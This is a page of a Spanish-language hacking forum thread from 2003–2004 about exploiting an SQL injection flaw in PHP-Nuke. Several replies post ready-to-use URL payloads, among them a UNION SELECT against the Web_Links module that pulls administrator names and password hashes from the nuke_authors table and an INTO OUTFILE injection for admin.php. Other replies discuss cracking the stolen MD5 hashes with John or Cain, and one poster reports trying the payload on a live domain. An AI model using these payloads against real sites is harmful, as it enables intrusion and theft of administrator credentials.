elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 4 5 6 Ir Abajo Respuesta Imprimir
Autor Tema: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....  (Leído 36,015 veces)
Kriptosys
F.I.H


Desconectado Desconectado

Mensajes: 849


[KriPt0SyS]


Ver Perfil
Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #10 en: 31 Octubre 2003, 14:42 »

MD5 no se puede descifrar..... pero como dice Blade se puede crackear.
 que no es mas que una Comparacion de Caracteres, es decir Toma un Caracter lo cifra y lo compara con el del Texto cifrado... y asi hasta que de con los caracteres correctos.

FiH nº 3 En camino!!!
En línea

Citar
F I H - http://www.fihezine.tsx.to 15/11/03 Libertad de expresión, Libertad de Conocimiento
elvizo

Desconectado Desconectado

Mensajes: 109


Takedown


Ver Perfil
Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #11 en: 1 Noviembre 2003, 03:02 »

bueno y q aplicacion se encarga de hacer dicah operacion? john lo hace? no se si oi algo o me estoy confundiendo
En línea

dsH-Team
na8us

Desconectado Desconectado

Mensajes: 4


El Cielo es el Limite!!!


Ver Perfil WWW
Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #12 en: 12 Noviembre 2003, 16:32 »

Aca solo hemos visto la manera de explotar el bug me gustaria saber cual es la manera de solucionar el problema  :-\

Salu2
En línea

En los momentos de crisis, sólo la imaginación es más importante que el conocimiento.
Albert Einstein
elvizo

Desconectado Desconectado

Mensajes: 109


Takedown


Ver Perfil
Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #13 en: 13 Noviembre 2003, 09:47 »

md5 se crackea con cain
En línea

dsH-Team
JaNi

Desconectado Desconectado

Mensajes: 6


VE4eveR


Ver Perfil
Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #14 en: 26 Diciembre 2003, 15:35 »

Citar
/admin.php?op=login&pwd=123&aid=Admin'%20INTO%20OUTFILE%20'/path_to_file/pwd.txt<=- Esto es para Unicamente el spaiz-nuke...
Que despues se visualiza en: /path_to_file/pwd.txt...


Eso no funciona en la mayoría de servidores :P
como hacer para sacar el password en md5 de otra forma?
En línea

[Ky3zZ]

Desconectado Desconectado

Mensajes: 48


Basta YA!!!


Ver Perfil WWW
Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #15 en: 10 Febrero 2004, 03:50 »

Realmente funciona
Para el PHP-Nuke y el Modulo WebLinks:

Para que muestre todos los administradores:
/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20

Y para que muestre los Password Codificados de los administradores:
/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20pwd,%20aid%20FROM%20nuke_authors%20

Pero tengo una duda como puedo crackear con el Cain el PWL? es que no lo entiendo.. por mas que traduzco manuales del cain al español no se como crackear el pasword si alguien sabe algo... que me mande un e-mail: juan_lux@hotmail.com
En línea

El "terrorismo" es una "espiniya" en la "sociedad" que hay que "eliminarla" lo antes posible, para podamos "vivir" en "PAZ"
[Ky3zZ]

Desconectado Desconectado

Mensajes: 48


Basta YA!!!


Ver Perfil WWW
Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #16 en: 16 Febrero 2004, 09:20 »

Weinas...oyes yo me preguntaba por casualidad... habria forma de saltarse la proteccion esa?
Es que no me acorde de guardar el Pass en MD5 y ahora an puesto la proteccion en la web donde lo hice y no se... amos que yo me preguntaba eso que si habia alguna manera de poder saber de nuevo el pass saltandose la proteccion..? ??? ??? ???
En línea

El "terrorismo" es una "espiniya" en la "sociedad" que hay que "eliminarla" lo antes posible, para podamos "vivir" en "PAZ"
CamelSmoke

Desconectado Desconectado

Mensajes: 1


semerrompiolabarraespaciadora


Ver Perfil WWW
Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #17 en: 20 Febrero 2004, 19:28 »

En realidad el Password MD5 no se saca de ninguna de esas maneras...bah, tal vez con el spaniz nuke, pero PHP-Nuke no muestra los pass MD5, al menos aun no encontre la forma de verlo ni cifrado ni nada, lo cual me gustaria ya que quiero asegurar mi sitio en PHP-Nuke.
En línea

CamelSmoke® - bibliobar.com.ar
p47ch
Visitante


Email
Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #18 en: 4 Marzo 2004, 23:54 »

Disculpar mi ignorancia, pero como se que versión de nuke esta utilizando dicha pagina?

Pues algunas no  lo dicen !

Gracias ! :P



Ademas me sale lo sig:

Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 238

Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 286


y


Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 286

Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 286


Cuando pongo

http://www.el-dominio.com/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20

Por q ?
« Última modificación: 5 Marzo 2004, 00:15 por p47ch » En línea

[Ky3zZ]

Desconectado Desconectado

Mensajes: 48


Basta YA!!!


Ver Perfil WWW
Re:exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones....
« Respuesta #19 en: 5 Marzo 2004, 01:57 »

Eso es muy facil, te salen los errores de la base de datos.. porque? pues por que la web donde as realizado el bug no tiene activado el modulo de Web_Links o simplemente a borrado ese modulo como preteccion.
Lo que sacamos encuenta.. que no se puede hacer en esa web.
En línea

El "terrorismo" es una "espiniya" en la "sociedad" que hay que "eliminarla" lo antes posible, para podamos "vivir" en "PAZ"
Páginas: 1 [2] 3 4 5 6 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
besitos , para todas y todos los que no hay y para los que estén.. « 1 2 3 »
Foro Libre
Jade19 25 7,025 Último mensaje 11 Marzo 2012, 21:40
por Jade19
FlashPlayer_APK_Varias versiones para todo Android y Sansung Galaxys
Android
ALEX_21_3 0 4,956 Último mensaje 30 Marzo 2012, 08:09
por ALEX_21_3
Una aplicación para dominarlas a todas
Noticias
wolfbcn 0 612 Último mensaje 21 Julio 2013, 22:16
por wolfbcn
Mnmllist, una web para todas las cosas minimalistas
Noticias
wolfbcn 0 313 Último mensaje 2 Julio 2018, 03:02
por wolfbcn
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines